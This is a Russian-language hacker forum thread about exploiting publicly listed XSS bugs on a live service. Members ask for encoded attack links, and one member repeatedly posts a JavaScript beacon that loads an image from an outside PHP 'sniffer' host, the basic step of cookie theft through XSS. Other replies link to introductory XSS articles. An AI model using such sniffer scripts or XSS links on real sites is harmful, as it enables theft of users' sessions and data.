Короче, это нашел не я. Уязвимости лежат в паблике уже долгое время. Обнаружил не я, а типуля, судя по сайту ему 16 лет. Короче респект и уважуха таким )) Надеюсь, если он выложил их в паблик, то ему их не жалко (засекаем время):
http://usatikov.com/bugs.php

Чет не работает нифига. Походу уже поправили давно..

Не надо, прекрасно работает

Чет не работает нифига. Походу уже поправили давно..
Ещё бы. Он ведь пишет, что сначала "стучит" админам, а потом публикует.

xss.netsec.ru чет отвалил...кто нить знает альтернативу...?=)

не вижу пользы в алертах, имхо, врятли кто будет ходить в кодированных сылках... лучше соц....

ВНИМАНИЕ!
Данное письмо содержит потенциально опасный Html-код,
заблокированный автоматической системой безопасности.
Нлять пацаны дайте кто нить в закодированном виде...я сам это делаю с трудом ...докуя времени уйдет. А так бага вполне рабочая думаю.

уже 8 часов прошло со времени создания поста, еще не закрыли )) Хотя выходные же ). Наверное еще и завтра работать будут )

Наверное нашел ту же самую багу, оповестил техподдержку и теперь бага, которая была найдена еще до него будет закрыта. :(

Создал сниффер на php хосте.
Набираю в строке браузера http://****/data.php?1.
В логах приходит "1". Все нормально.

Создаю html страничку к кодом:

<script type="text/javascript">
img=new Image();
img.src="http://****/data.php?1"
</script>

Загружаю ее в своем браузере. Ничего на сниффер не приходит. Почему?

а конкретно кто то может создать видео для ламеров КАК ВСЁ ВЫШЕ НАПИСАНОЕ ИСПОЛЬЗОВАТЬ НА ПРАКТИКЕ

а то извините тут все такие программисты и гуру, что ваши слова как "матюки" не опытному пользователю - не понятно :confused:

2itiran
Почитай хотябы простенькие статьи по XSS, можешь начать с этого http://forum.antichat.ru/thread20140.html
Потом найди более подробную статью, рекомендую статью Zadoxlik'a опубликованную в августовском Хакере.

Без базового знание, и видео тебе вряд ли будет интересно и полезно

Ну разве сложно ответить просто на вопрос? Я же не прошу сказать почему не работаеть такая то XSS. Я хочу узнать почему не выполняется такой скрипт:

<script type="text/javascript">
img=new Image();
img.src="http://****/data.php?1"
</script>

Ну разве сложно ответить просто на вопрос? Я же не прошу сказать почему не работаеть такая то XSS. Я хочу узнать почему не выполняется такой скрипт:

<script type="text/javascript">
img=new Image();
img.src="http://****/data.php?1"
</script>
в IE точно выполняется

а можно ссылочку на эту "статью Zadoxlik'a" ?

Ohhh usatikov very very old true hэcker.

а можно ссылочку на эту "статью Zadoxlik'a" ?
http://www.xakep.ru/articles/magazine/archive.asp?magazine=xa&year=2006

Восьмой номер. Сливай PDF арихив и читай

2itiran
Почитай хотябы простенькие статьи по XSS, можешь начать с этого http://forum.antichat.ru/thread20140.html
Потом найди более подробную статью, рекомендую статью Zadoxlik'a опубликованную в августовском Хакере.

Без базового знание, и видео тебе вряд ли будет интересно и полезно
OTLICHNO!!!!!!!!!!!!